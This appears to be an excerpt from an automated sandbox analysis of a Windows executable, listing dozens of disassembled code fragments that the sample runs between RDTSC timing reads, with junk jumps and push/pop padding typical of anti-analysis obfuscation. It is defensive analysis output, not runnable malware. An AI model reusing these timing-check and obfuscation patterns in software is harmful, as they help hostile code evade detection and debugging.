                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A9A9 second address: 000000000041A9C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jng 00007F7E954D64A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A9C9 second address: 000000000041A9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041C54F second address: 000000000041C56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7E954D64B4h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041C56C second address: 000000000041C570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000004205A3 second address: 00000000004205BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7E954D64B0h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000004205BF second address: 00000000004205C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000004205C3 second address: 00000000004205CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000004205CD second address: 00000000004205D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000421E32 second address: 0000000000421E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F7E954D64B2h 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000423E40 second address: 0000000000423E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000423E47 second address: 0000000000423E54 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7E954D64A8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000423E54 second address: 0000000000423E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D60881 second address: 0000000004D608EE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7E954D64B6h 0x00000008 and ax, 0168h 0x0000000d jmp 00007F7E954D64ABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F7E954D64B8h 0x0000001b or cl, FFFFFFC8h 0x0000001e jmp 00007F7E954D64ABh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F7E954D64B5h 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D608EE second address: 0000000004D6090D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dh, D7h 0x00000010 mov edx, eax 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D6090D second address: 0000000004D60932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E954D64ADh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30E91 second address: 0000000004D30ECF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7E95375CFEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov di, 5DC4h 0x00000015 pushad 0x00000016 push edx 0x00000017 pop esi 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e push edi 0x0000001f pushad 0x00000020 popad 0x00000021 pop ecx 0x00000022 mov eax, edi 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30ECF second address: 0000000004D30ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30ED3 second address: 0000000004D30ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30ED7 second address: 0000000004D30EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30EDD second address: 0000000004D30EE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA07C0 second address: 0000000004DA07C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA07C6 second address: 0000000004DA07E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E95375CFAh 0x00000008 movzx esi, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov esi, edi 0x00000014 push edi 0x00000015 pop esi 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA07E2 second address: 0000000004DA07F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E954D64B3h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA07F9 second address: 0000000004DA0821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F7E95375D05h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0821 second address: 0000000004DA0825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0825 second address: 0000000004DA0829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0829 second address: 0000000004DA082F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30B5E second address: 0000000004D30B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30B64 second address: 0000000004D30B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30B68 second address: 0000000004D30BB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov al, bh 0x00000012 pushfd 0x00000013 jmp 00007F7E95375D06h 0x00000018 xor cl, FFFFFF98h 0x0000001b jmp 00007F7E95375CFBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30BB0 second address: 0000000004D30BEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E954D64B8h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30BEC second address: 0000000004D30BFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30BFB second address: 0000000004D30C01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30C01 second address: 0000000004D30C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30C05 second address: 0000000004D30C16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30C16 second address: 0000000004D30C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30C1A second address: 0000000004D30C1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30C1E second address: 0000000004D30C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80188 second address: 0000000004D801FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 mov di, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov bx, ax 0x00000012 mov ax, 0427h 0x00000016 popad 0x00000017 sub ebx, ebx 0x00000019 pushad 0x0000001a pushad 0x0000001b mov dx, 46CAh 0x0000001f mov eax, ebx 0x00000021 popad 0x00000022 pushfd 0x00000023 jmp 00007F7E95375D07h 0x00000028 sub al, 0000001Eh 0x0000002b jmp 00007F7E95375D09h 0x00000030 popfd 0x00000031 popad 0x00000032 test esi, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F7E95375D08h 0x0000003d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D801FE second address: 0000000004D80202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80202 second address: 0000000004D80208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80208 second address: 0000000004D8020E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D8020E second address: 0000000004D80212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80212 second address: 0000000004D80216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80216 second address: 0000000004D802D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F7F0799BE66h 0x0000000e jmp 00007F7E95375D04h 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a jmp 00007F7E95375D00h 0x0000001f mov ecx, esi 0x00000021 pushad 0x00000022 movzx esi, dx 0x00000025 mov di, 86EEh 0x00000029 popad 0x0000002a je 00007F7F0799BE3Fh 0x00000030 jmp 00007F7E95375D05h 0x00000035 test byte ptr [77436968h], 00000002h 0x0000003c jmp 00007F7E95375CFEh 0x00000041 jne 00007F7F0799BE22h 0x00000047 pushad 0x00000048 mov esi, 3CC755BDh 0x0000004d mov bx, si 0x00000050 popad 0x00000051 mov edx, dword ptr [ebp+0Ch] 0x00000054 jmp 00007F7E95375D04h 0x00000059 xchg eax, ebx 0x0000005a pushad 0x0000005b jmp 00007F7E95375CFEh 0x00000060 mov si, E8D1h 0x00000064 popad 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F7E95375CFAh 0x0000006d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D802D3 second address: 0000000004D802D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D802D9 second address: 0000000004D8030A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dx, si 0x0000000f pushfd 0x00000010 jmp 00007F7E95375CFEh 0x00000015 add ecx, 1F87E588h 0x0000001b jmp 00007F7E95375CFBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D8030A second address: 0000000004D80360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E954D64AFh 0x00000009 adc ecx, 388029CEh 0x0000000f jmp 00007F7E954D64B9h 0x00000014 popfd 0x00000015 mov cx, 4FD7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7E954D64B9h 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D8042E second address: 0000000004D80432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80432 second address: 0000000004D80438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80438 second address: 0000000004D80464 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E95375D07h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DE1B12 second address: 0000000004DE1B87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007F7E954D64B9h 0x0000000c or ax, DE06h 0x00000011 jmp 00007F7E954D64B1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F7E954D64B3h 0x00000024 and ecx, 39B56D3Eh 0x0000002a jmp 00007F7E954D64B9h 0x0000002f popfd 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DE1B87 second address: 0000000004DE1BB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E95375D04h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DE1BB9 second address: 0000000004DE1C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F7E954D64B4h 0x00000010 push ecx 0x00000011 pushfd 0x00000012 jmp 00007F7E954D64B1h 0x00000017 xor ah, FFFFFFE6h 0x0000001a jmp 00007F7E954D64B1h 0x0000001f popfd 0x00000020 pop eax 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007F7E954D64B7h 0x00000029 push 0000007Fh 0x0000002b pushad 0x0000002c jmp 00007F7E954D64B4h 0x00000031 mov cx, 0501h 0x00000035 popad 0x00000036 push 00000001h 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F7E954D64B6h 0x00000041 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DE1C59 second address: 0000000004DE1C5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DE1CB0 second address: 0000000004DE1CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DE1CB4 second address: 0000000004DE1CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DE1CBA second address: 0000000004DE1B12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, A1h 0x00000005 pushfd 0x00000006 jmp 00007F7E954D64B7h 0x0000000b or esi, 060172FEh 0x00000011 jmp 00007F7E954D64B9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a retn 0004h 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 call ebx 0x00000023 mov edi, edi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007F7E954D64B8h 0x0000002d mov ebx, ecx 0x0000002f popad 0x00000030 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA09CA second address: 0000000004DA09D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA09D0 second address: 0000000004DA09E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E954D64AAh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA09E6 second address: 0000000004DA09EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D805EB second address: 0000000004D80604 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edx, si 0x00000010 mov al, A8h 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80604 second address: 0000000004D80631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7E95375CFBh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80631 second address: 0000000004D80635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80635 second address: 0000000004D8063B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D8063B second address: 0000000004D80675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F7E954D64B0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7E954D64B7h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E0000D second address: 0000000004E00046 instructions: 0x00000000 rdtsc 0x00000002 call 00007F7E95375D06h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E95375D08h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E00046 second address: 0000000004E00055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E00055 second address: 0000000004E0005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E0005B second address: 0000000004E0005F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E0005F second address: 0000000004E000E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F7E95375D07h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushad 0x00000014 mov ch, 60h 0x00000016 pushfd 0x00000017 jmp 00007F7E95375D07h 0x0000001c adc si, 47AEh 0x00000021 jmp 00007F7E95375D09h 0x00000026 popfd 0x00000027 popad 0x00000028 pushad 0x00000029 mov ecx, 6DC2EF0Dh 0x0000002e call 00007F7E95375CFAh 0x00000033 pop esi 0x00000034 popad 0x00000035 popad 0x00000036 push dword ptr [ebp+0Ch] 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c movzx esi, di 0x0000003f mov edi, 3B2A37CAh 0x00000044 popad 0x00000045 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E000E1 second address: 0000000004E00124 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E954D64AEh 0x00000009 or ecx, 07C7AB88h 0x0000000f jmp 00007F7E954D64ABh 0x00000014 popfd 0x00000015 mov bx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push dword ptr [ebp+08h] 0x0000001e pushad 0x0000001f jmp 00007F7E954D64B0h 0x00000024 push eax 0x00000025 push edx 0x00000026 movzx eax, dx 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E00196 second address: 0000000004E001B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E001B3 second address: 0000000004E001B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E001B9 second address: 0000000004E001BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0682 second address: 0000000004DB0688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
